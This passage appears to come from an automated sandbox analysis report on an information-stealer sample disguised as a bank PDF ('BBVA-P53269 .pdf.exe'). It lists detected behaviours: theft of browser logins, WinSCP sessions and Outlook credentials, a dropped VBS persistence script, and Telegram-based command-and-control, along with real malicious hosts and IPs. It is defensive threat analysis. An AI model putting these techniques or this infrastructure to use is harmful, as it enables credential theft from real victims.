            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:19]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :25:17]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:27:11]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:28]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, KeyDataNuoaXkTB.txt.6.drBinary or memory string: [02:25:44]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:45]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>F
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:27]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749799651.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:57]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:30]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--15]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 28:57]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751403353.0000000003975000.00000004.00000020.00020000.00000000.sdmp, KeyDataIxTZPxTo.txt.6.drBinary or memory string: [02:25:53]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:49]<<Program Manager>>O
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeQueries volume information: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeQueries volume information: C:\Users\user\AppData\Roaming\AllData.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Generic Dropper
            Source: Yara matchFile source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Jump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting            		Valid Accounts1
            Scheduled Task/Job            		111
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		12
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		1
            Credentials in Registry            		13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		2
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		12
            Obfuscated Files or Information            		Security Account Manager21
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron2
            Registry Run Keys / Startup Folder            		2
            Registry Run Keys / Startup Folder            		1
            Software Packing            		NTDS1
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            Process Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Virtualization/Sandbox Evasion            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629827 Sample: BBVA-P53269 .pdf.exe Startdate: 05/03/2025 Architecture: WINDOWS Score: 100 28 api.telegram.org 2->28 30 showip.net 2->30 32 alcomax.com.co 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 48 11 other signatures 2->48 8 wscript.exe 1 2->8         started        11 BBVA-P53269 .pdf.exe 15 5 2->11         started        signatures3 46 Uses the Telegram API (likely for C&C communication) 28->46 process4 dnsIp5 56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->56 15 AllData.exe 14 2 8->15         started        38 alcomax.com.co 204.44.192.90, 443, 49704, 49772 ASN-QUADRANET-GLOBALUS Canada 11->38 24 C:\Users\user\AppData\Roaming\AllData.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\Roaming\...\AllData.vbs, ASCII 11->26 dropped 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 18 InstallUtil.exe 26 11->18         started        file6 signatures7 process8 dnsIp9 60 Multi AV Scanner detection for dropped file 15->60 21 InstallUtil.exe 84 15->21         started        34 api.telegram.org 149.154.167.220, 443, 49915, 49936 TELEGRAMRU United Kingdom 18->34 36 showip.net 162.55.60.2, 49716, 49793, 80 ACPCA United States 18->36 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->62 64 Tries to steal Mail credentials (via file / registry access) 18->64 signatures10 process11 signatures12 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->50 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.